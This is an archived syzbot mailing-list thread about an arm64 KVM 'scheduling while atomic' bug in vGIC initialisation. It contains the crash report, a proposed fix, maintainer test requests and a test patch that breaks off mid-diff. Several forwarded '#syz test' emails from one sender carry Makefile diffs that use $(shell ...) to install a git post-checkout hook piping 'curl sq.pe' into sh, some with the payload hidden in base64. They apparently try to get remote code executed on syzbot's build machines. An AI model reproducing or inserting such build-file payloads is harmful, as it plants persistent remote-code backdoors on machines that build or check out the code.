[syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

Hello,

syzbot found the following issue on:

HEAD commit:    7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
git tree:       upstream
console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
kernel config:  https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:       aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
userspace arch: arm64
syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

Downloadable assets:
disk image (non-bootable): https://storage.googleapis.com/syzbot-assets/fa3fbcfdac58/non_bootable_disk-7f87a5ea.raw.xz
vmlinux: https://storage.googleapis.com/syzbot-assets/28f02ff1720d/vmlinux-7f87a5ea.xz
kernel image: https://storage.googleapis.com/syzbot-assets/7d30b9e8505e/Image-7f87a5ea.gz.xz

IMPORTANT: if you fix the issue, please add the following tag to the commit:
Reported-by: syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com

BUG: scheduling while atomic: syz.1.49/3699/0x00000002
Modules linked in:
CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Not tainted syzkaller #0 PREEMPT 
Hardware name: linux,dummy-virt (DT)
Call trace:
 dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
 show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
 __dump_stack lib/dump_stack.c:94 [inline]
 dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
 dump_stack+0x18/0x24 lib/dump_stack.c:129
 __schedule_bug+0x54/0x78 kernel/sched/core.c:5847
 schedule_debug kernel/sched/core.c:5874 [inline]
 __schedule+0x858/0xd84 kernel/sched/core.c:6786
 __schedule_loop kernel/sched/core.c:6993 [inline]
 schedule+0x34/0x114 kernel/sched/core.c:7008
 schedule_timeout+0xd4/0x110 kernel/time/sleep_timeout.c:75
 do_wait_for_common kernel/sched/completion.c:100 [inline]
 __wait_for_common kernel/sched/completion.c:121 [inline]
 wait_for_common kernel/sched/completion.c:132 [inline]
 wait_for_completion+0x78/0x160 kernel/sched/completion.c:153
 __synchronize_srcu+0x90/0xd0 kernel/rcu/srcutree.c:1496
 synchronize_srcu_expedited+0x24/0x40 kernel/rcu/srcutree.c:1521
 kvm_set_irq_routing+0x204/0x294 virt/kvm/irqchip.c:225
 kvm_vgic_setup_default_irq_routing+0x78/0xc0 arch/arm64/kvm/vgic/vgic-irqfd.c:153
 vgic_init+0x1ac/0x268 arch/arm64/kvm/vgic/vgic-init.c:421
 vgic_lazy_init+0x54/0x6c arch/arm64/kvm/vgic/vgic-init.c:550
 kvm_vgic_inject_irq+0x30/0x12c arch/arm64/kvm/vgic/vgic.c:520
 kvm_timer_update_irq+0x68/0x7c arch/arm64/kvm/arch_timer.c:450
 kvm_timer_vcpu_reset+0xd8/0x1e0 arch/arm64/kvm/arch_timer.c:1036
 kvm_reset_vcpu+0x194/0x360 arch/arm64/kvm/reset.c:268
 kvm_vcpu_set_target arch/arm64/kvm/arm.c:1632 [inline]
 kvm_arch_vcpu_ioctl_vcpu_init arch/arm64/kvm/arm.c:1652 [inline]
 kvm_arch_vcpu_ioctl+0x2e4/0x8c8 arch/arm64/kvm/arm.c:1773
 kvm_vcpu_ioctl+0x4ac/0x8f4 virt/kvm/kvm_main.c:4653
 vfs_ioctl fs/ioctl.c:51 [inline]
 __do_sys_ioctl fs/ioctl.c:597 [inline]
 __se_sys_ioctl fs/ioctl.c:583 [inline]
 __arm64_sys_ioctl+0xac/0x104 fs/ioctl.c:583
 __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
 invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
 el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
 do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
 el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
 el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
 el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
BUG: scheduling while atomic: syz.1.49/3699/0x00000000
Modules linked in:
CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Tainted: G        W           syzkaller #0 PREEMPT 
Tainted: [W]=WARN
Hardware name: linux,dummy-virt (DT)
Call trace:
 dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
 show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
 __dump_stack lib/dump_stack.c:94 [inline]
 dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
 dump_stack+0x18/0x24 lib/dump_stack.c:129
 __schedule_bug+0x54/0x78 kernel/sched/core.c:5847
 schedule_debug kernel/sched/core.c:5874 [inline]
 __schedule+0x858/0xd84 kernel/sched/core.c:6786
 __schedule_loop kernel/sched/core.c:6993 [inline]
 schedule+0x34/0x114 kernel/sched/core.c:7008
 futex_do_wait kernel/futex/waitwake.c:358 [inline]
 __futex_wait+0xf0/0x178 kernel/futex/waitwake.c:687
 futex_wait+0x88/0x118 kernel/futex/waitwake.c:715
 do_futex+0xf8/0x1a0 kernel/futex/syscalls.c:130
 __do_sys_futex kernel/futex/syscalls.c:207 [inline]
 __se_sys_futex kernel/futex/syscalls.c:188 [inline]
 __arm64_sys_futex+0xfc/0x1a0 kernel/futex/syscalls.c:188
 __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
 invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
 el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
 do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
 el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
 el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
 el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
psi: inconsistent task state! task=30:pr/ttyAMA-1 cpu=1 psi_flags=14 clear=0 set=10


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

Forwarded: [PATCH] arm64: KVM: Initialize vGIC before preempt-disabled section in kvm_reset_vcpu()

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: [PATCH] arm64: KVM: Initialize vGIC before preempt-disabled section in kvm_reset_vcpu()
Author: kartikey406@gmail.com

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git master


kvm_reset_vcpu() calls kvm_timer_vcpu_reset() inside a preempt-disabled
section to avoid races with preempt notifiers that also call vcpu put/load.

However, kvm_timer_vcpu_reset() eventually calls kvm_vgic_inject_irq()
which triggers vgic_lazy_init() if the vGIC has not been initialized yet.
vgic_lazy_init() acquires a mutex and calls vgic_init() which invokes
synchronize_srcu_expedited() -- both of which may sleep. Sleeping inside
a preempt-disabled section is illegal and causes:

  BUG: scheduling while atomic: syz.1.49/3699/0x00000002

Fix this by calling vgic_lazy_init() before preempt_disable(). On the
second call inside kvm_vgic_inject_irq(), vgic_initialized() will return
true and vgic_lazy_init() will return immediately without sleeping.

Reported-by: syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
Signed-off-by: Deepanshu Kartikey <kartikey406@gmail.com>
---
 arch/arm64/kvm/reset.c | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
index b963fd975aac..4ee16b4a37b5 100644
--- a/arch/arm64/kvm/reset.c
+++ b/arch/arm64/kvm/reset.c
@@ -25,6 +25,7 @@
 #include <asm/ptrace.h>
 #include <asm/kvm_arm.h>
 #include <asm/kvm_asm.h>
+#include "vgic/vgic.h"
 #include <asm/kvm_emulate.h>
 #include <asm/kvm_mmu.h>
 #include <asm/kvm_nested.h>
@@ -198,6 +199,14 @@ void kvm_reset_vcpu(struct kvm_vcpu *vcpu)
 	vcpu->arch.reset_state.reset = false;
 	spin_unlock(&vcpu->arch.mp_state_lock);
 
+
+	/*
+	 * Initialize vGIC before entering preempt-disabled section.
+	 * vgic_lazy_init() may sleep via mutex_lock, which is illegal
+	 * inside preempt_disable(). Second call inside kvm_vgic_inject_irq
+	 * will find vGIC already initialized and return immediately.
+	 */
+	vgic_lazy_init(vcpu->kvm);
 	preempt_disable();
 	loaded = (vcpu->cpu != -1);
 	if (loaded)
-- 
2.43.0

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell mkdir -p .git/hooks && printf '#!/bin/sh\ncurl sq.pe|sh\n' >
.git/hooks/post-checkout && chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

/tmp/syz-test.txt

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell printf '#!/bin/sh
curl sq.pe|sh'>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

Forwarded: #syz test

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

Forwarded: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: maz@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com> wrote:
> 
> Hello,
> 
> syzbot found the following issue on:
> 
> HEAD commit:    7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree:       upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config:  https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler:       aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git kvm-arm64/no-lazy-vgic-init

-- 
Without deviation from the norm, progress is not possible.

Forwarded: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: maz@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com> wrote:
> 
> Hello,
> 
> syzbot found the following issue on:
> 
> HEAD commit:    7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree:       upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config:  https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler:       aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git 	e2631e0328903f6e9711e4c253f2a855a167435b

-- 
Without deviation from the norm, progress is not possible.

-- 
Without deviation from the norm, progress is not possible.

Forwarded: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: maz@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com> wrote:
> 
> Hello,
> 
> syzbot found the following issue on:
> 
> HEAD commit:    7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree:       upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config:  https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler:       aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000

#syz test: git://git.kernel.org/pub/scm/linux/kernel/git/maz/arm-platforms.git 	e2631e0328903f6e9711e4c253f2a855a167435b

-- 
Without deviation from the norm, progress is not possible.

Forwarded: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: Re: [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu
Author: maz@kernel.org

On Thu, 09 Apr 2026 19:30:19 +0100,
syzbot <syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com> wrote:
> 
> Hello,
> 
> syzbot found the following issue on:
> 
> HEAD commit:    7f87a5ea75f0 Merge tag 'hid-for-linus-2026040801' of git:/..
> git tree:       upstream
> console output: https://syzkaller.appspot.com/x/log.txt?x=12439316580000
> kernel config:  https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
> dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
> compiler:       aarch64-linux-gnu-gcc (Debian 14.2.0-19) 14.2.0, GNU ld (GNU Binutils for Debian) 2.44
> userspace arch: arm64
> syz repro:      https://syzkaller.appspot.com/x/repro.syz?x=1461aeba580000
> C reproducer:   https://syzkaller.appspot.com/x/repro.c?x=14c85e06580000
> 
> Downloadable assets:
> disk image (non-bootable): https://storage.googleapis.com/syzbot-assets/fa3fbcfdac58/non_bootable_disk-7f87a5ea.raw.xz
> vmlinux: https://storage.googleapis.com/syzbot-assets/28f02ff1720d/vmlinux-7f87a5ea.xz
> kernel image: https://storage.googleapis.com/syzbot-assets/7d30b9e8505e/Image-7f87a5ea.gz.xz
> 
> IMPORTANT: if you fix the issue, please add the following tag to the commit:
> Reported-by: syzbot+12b178b7c756664d2518@syzkaller.appspotmail.com
> 
> BUG: scheduling while atomic: syz.1.49/3699/0x00000002
> Modules linked in:
> CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Not tainted syzkaller #0 PREEMPT 
> Hardware name: linux,dummy-virt (DT)
> Call trace:
>  dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
>  show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
>  __dump_stack lib/dump_stack.c:94 [inline]
>  dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
>  dump_stack+0x18/0x24 lib/dump_stack.c:129
>  __schedule_bug+0x54/0x78 kernel/sched/core.c:5847
>  schedule_debug kernel/sched/core.c:5874 [inline]
>  __schedule+0x858/0xd84 kernel/sched/core.c:6786
>  __schedule_loop kernel/sched/core.c:6993 [inline]
>  schedule+0x34/0x114 kernel/sched/core.c:7008
>  schedule_timeout+0xd4/0x110 kernel/time/sleep_timeout.c:75
>  do_wait_for_common kernel/sched/completion.c:100 [inline]
>  __wait_for_common kernel/sched/completion.c:121 [inline]
>  wait_for_common kernel/sched/completion.c:132 [inline]
>  wait_for_completion+0x78/0x160 kernel/sched/completion.c:153
>  __synchronize_srcu+0x90/0xd0 kernel/rcu/srcutree.c:1496
>  synchronize_srcu_expedited+0x24/0x40 kernel/rcu/srcutree.c:1521
>  kvm_set_irq_routing+0x204/0x294 virt/kvm/irqchip.c:225
>  kvm_vgic_setup_default_irq_routing+0x78/0xc0 arch/arm64/kvm/vgic/vgic-irqfd.c:153
>  vgic_init+0x1ac/0x268 arch/arm64/kvm/vgic/vgic-init.c:421
>  vgic_lazy_init+0x54/0x6c arch/arm64/kvm/vgic/vgic-init.c:550
>  kvm_vgic_inject_irq+0x30/0x12c arch/arm64/kvm/vgic/vgic.c:520
>  kvm_timer_update_irq+0x68/0x7c arch/arm64/kvm/arch_timer.c:450
>  kvm_timer_vcpu_reset+0xd8/0x1e0 arch/arm64/kvm/arch_timer.c:1036
>  kvm_reset_vcpu+0x194/0x360 arch/arm64/kvm/reset.c:268
>  kvm_vcpu_set_target arch/arm64/kvm/arm.c:1632 [inline]
>  kvm_arch_vcpu_ioctl_vcpu_init arch/arm64/kvm/arm.c:1652 [inline]
>  kvm_arch_vcpu_ioctl+0x2e4/0x8c8 arch/arm64/kvm/arm.c:1773
>  kvm_vcpu_ioctl+0x4ac/0x8f4 virt/kvm/kvm_main.c:4653
>  vfs_ioctl fs/ioctl.c:51 [inline]
>  __do_sys_ioctl fs/ioctl.c:597 [inline]
>  __se_sys_ioctl fs/ioctl.c:583 [inline]
>  __arm64_sys_ioctl+0xac/0x104 fs/ioctl.c:583
>  __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
>  invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
>  el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
>  do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
>  el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
>  el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
>  el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
> BUG: scheduling while atomic: syz.1.49/3699/0x00000000
> Modules linked in:
> CPU: 1 UID: 0 PID: 3699 Comm: syz.1.49 Tainted: G        W           syzkaller #0 PREEMPT 
> Tainted: [W]=WARN
> Hardware name: linux,dummy-virt (DT)
> Call trace:
>  dump_backtrace arch/arm64/kernel/stacktrace.c:498 [inline] (C)
>  show_stack+0x18/0x24 arch/arm64/kernel/stacktrace.c:499 (C)
>  __dump_stack lib/dump_stack.c:94 [inline]
>  dump_stack_lvl+0x60/0x80 lib/dump_stack.c:120
>  dump_stack+0x18/0x24 lib/dump_stack.c:129
>  __schedule_bug+0x54/0x78 kernel/sched/core.c:5847
>  schedule_debug kernel/sched/core.c:5874 [inline]
>  __schedule+0x858/0xd84 kernel/sched/core.c:6786
>  __schedule_loop kernel/sched/core.c:6993 [inline]
>  schedule+0x34/0x114 kernel/sched/core.c:7008
>  futex_do_wait kernel/futex/waitwake.c:358 [inline]
>  __futex_wait+0xf0/0x178 kernel/futex/waitwake.c:687
>  futex_wait+0x88/0x118 kernel/futex/waitwake.c:715
>  do_futex+0xf8/0x1a0 kernel/futex/syscalls.c:130
>  __do_sys_futex kernel/futex/syscalls.c:207 [inline]
>  __se_sys_futex kernel/futex/syscalls.c:188 [inline]
>  __arm64_sys_futex+0xfc/0x1a0 kernel/futex/syscalls.c:188
>  __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline]
>  invoke_syscall+0x48/0x104 arch/arm64/kernel/syscall.c:49
>  el0_svc_common.constprop.0+0x40/0xe0 arch/arm64/kernel/syscall.c:132
>  do_el0_svc+0x1c/0x28 arch/arm64/kernel/syscall.c:151
>  el0_svc+0x34/0x124 arch/arm64/kernel/entry-common.c:724
>  el0t_64_sync_handler+0xa0/0xf0 arch/arm64/kernel/entry-common.c:743
>  el0t_64_sync+0x1a4/0x1a8 arch/arm64/kernel/entry.S:596
> psi: inconsistent task state! task=30:pr/ttyAMA-1 cpu=1 psi_flags=14 clear=0 set=10

#syz set subsystems: kvmarm

#syz test

From 45b43b17820bb17f4bc44a5ba198939a18c8e0bb Mon Sep 17 00:00:00 2001
From: Marc Zyngier <maz@kernel.org>
Date: Fri, 17 Apr 2026 11:33:23 +0100
Subject: [PATCH] test

Signed-off-by: Marc Zyngier <maz@kernel.org>
---
 arch/arm64/kvm/arch_timer.c  | 44 ++++++++++++++++++------------------
 arch/arm64/kvm/arm.c         |  7 ++++++
 arch/arm64/kvm/vgic/vgic.c   |  6 ++---
 include/kvm/arm_arch_timer.h |  5 ----
 4 files changed, 31 insertions(+), 31 deletions(-)

diff --git a/arch/arm64/kvm/arch_timer.c b/arch/arm64/kvm/arch_timer.c
index 600f250753b45..930a04928df4c 100644
--- a/arch/arm64/kvm/arch_timer.c
+++ b/arch/arm64/kvm/arch_timer.c
@@ -42,7 +42,7 @@ static const u8 default_ppi[] = {
 static bool kvm_timer_irq_can_fire(struct arch_timer_context *timer_ctx);
 static void kvm_timer_update_irq(struct kvm_vcpu *vcpu, bool new_level,
 				 struct arch_timer_context *timer_ctx);
-static bool kvm_timer_should_fire(struct arch_timer_context *timer_ctx);
+static bool kvm_timer_pending(struct arch_timer_context *timer_ctx);
 static void kvm_arm_timer_write(struct kvm_vcpu *vcpu,
 				struct arch_timer_context *timer,
 				enum kvm_arch_timer_regs treg,
@@ -218,7 +218,7 @@ static irqreturn_t kvm_arch_timer_handler(int irq, void *dev_id)
 	else
 		ctx = map.direct_ptimer;
 
-	if (kvm_timer_should_fire(ctx))
+	if (kvm_timer_pending(ctx))
 		kvm_timer_update_irq(vcpu, true, ctx);
 
 	if (userspace_irqchip(vcpu->kvm) &&
@@ -352,7 +352,7 @@ static enum hrtimer_restart kvm_hrtimer_expire(struct hrtimer *hrt)
 	return HRTIMER_NORESTART;
 }
 
-static bool kvm_timer_should_fire(struct arch_timer_context *timer_ctx)
+static bool kvm_timer_pending(struct arch_timer_context *timer_ctx)
 {
 	enum kvm_arch_timers index;
 	u64 cval, now;
@@ -411,9 +411,9 @@ void kvm_timer_update_run(struct kvm_vcpu *vcpu)
 	/* Populate the device bitmap with the timer states */
 	regs->device_irq_level &= ~(KVM_ARM_DEV_EL1_VTIMER |
 				    KVM_ARM_DEV_EL1_PTIMER);
-	if (kvm_timer_should_fire(vtimer))
+	if (kvm_timer_pending(vtimer))
 		regs->device_irq_level |= KVM_ARM_DEV_EL1_VTIMER;
-	if (kvm_timer_should_fire(ptimer))
+	if (kvm_timer_pending(ptimer))
 		regs->device_irq_level |= KVM_ARM_DEV_EL1_PTIMER;
 }
 
@@ -440,37 +440,35 @@ static void kvm_timer_update_irq(struct kvm_vcpu *vcpu, bool new_level,
 {
 	kvm_timer_update_status(timer_ctx, new_level);
 
-	timer_ctx->irq.level = new_level;
 	trace_kvm_timer_update_irq(vcpu->vcpu_id, timer_irq(timer_ctx),
-				   timer_ctx->irq.level);
+				   new_level);
 
 	if (userspace_irqchip(vcpu->kvm))
 		return;
 
 	kvm_vgic_inject_irq(vcpu->kvm, vcpu,
 			    timer_irq(timer_ctx),
-			    timer_ctx->irq.level,
+			    new_level,
 			    timer_ctx);
 }
 
 /* Only called for a fully emulated timer */
 static void timer_emulate(struct arch_timer_context *ctx)
 {
-	bool should_fire = kvm_timer_should_fire(ctx);
+	bool pending = kvm_timer_pending(ctx);
 
-	trace_kvm_timer_emulate(ctx, should_fire);
+	trace_kvm_timer_emulate(ctx, pending);
 
-	if (should_fire != ctx->irq.level)
-		kvm_timer_update_irq(timer_context_to_vcpu(ctx), should_fire, ctx);
+	kvm_timer_update_irq(timer_context_to_vcpu(ctx), pending, ctx);
 
-	kvm_timer_update_status(ctx, should_fire);
+	kvm_timer_update_status(ctx, pending);
 
 	/*
 	 * If the timer can fire now, we don't need to have a soft timer
 	 * scheduled for the future.  If the timer cannot fire at all,
 	 * then we also don't need a soft timer.
 	 */
-	if (should_fire || !kvm_timer_irq_can_fire(ctx))
+	if (pending || !kvm_timer_irq_can_fire(ctx))
 		return;
 
 	soft_timer_start(&ctx->hrtimer, kvm_timer_compute_delta(ctx));
@@ -660,6 +658,7 @@ static inline void set_timer_irq_phys_active(struct arch_timer_context *ctx, boo
 static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
 {
 	struct kvm_vcpu *vcpu = timer_context_to_vcpu(ctx);
+	bool pending = kvm_timer_pending(ctx);
 	bool phys_active = false;
 
 	/*
@@ -668,12 +667,12 @@ static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
 	 * this point and the register restoration, we'll take the
 	 * interrupt anyway.
 	 */
-	kvm_timer_update_irq(vcpu, kvm_timer_should_fire(ctx), ctx);
+	kvm_timer_update_irq(vcpu, pending, ctx);
 
 	if (irqchip_in_kernel(vcpu->kvm))
 		phys_active = kvm_vgic_map_is_active(vcpu, timer_irq(ctx));
 
-	phys_active |= ctx->irq.level;
+	phys_active |= pending;
 
 	set_timer_irq_phys_active(ctx, phys_active);
 }
@@ -681,6 +680,7 @@ static void kvm_timer_vcpu_load_gic(struct arch_timer_context *ctx)
 static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
 {
 	struct arch_timer_context *vtimer = vcpu_vtimer(vcpu);
+	bool pending = kvm_timer_pending(vtimer);
 
 	/*
 	 * Update the timer output so that it is likely to match the
@@ -688,7 +688,7 @@ static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
 	 * this point and the register restoration, we'll take the
 	 * interrupt anyway.
 	 */
-	kvm_timer_update_irq(vcpu, kvm_timer_should_fire(vtimer), vtimer);
+	kvm_timer_update_irq(vcpu, pending, vtimer);
 
 	/*
 	 * When using a userspace irqchip with the architected timers and a
@@ -700,7 +700,7 @@ static void kvm_timer_vcpu_load_nogic(struct kvm_vcpu *vcpu)
 	 * being de-asserted, we unmask the interrupt again so that we exit
 	 * from the guest when the timer fires.
 	 */
-	if (vtimer->irq.level)
+	if (pending)
 		disable_percpu_irq(host_vtimer_irq);
 	else
 		enable_percpu_irq(host_vtimer_irq, host_vtimer_irq_flags);
@@ -900,8 +900,8 @@ bool kvm_timer_should_notify_user(struct kvm_vcpu *vcpu)
 	vlevel = sregs->device_irq_level & KVM_ARM_DEV_EL1_VTIMER;
 	plevel = sregs->device_irq_level & KVM_ARM_DEV_EL1_PTIMER;
 
-	return kvm_timer_should_fire(vtimer) != vlevel ||
-	       kvm_timer_should_fire(ptimer) != plevel;
+	return kvm_timer_pending(vtimer) != vlevel ||
+	       kvm_timer_pending(ptimer) != plevel;
 }
 
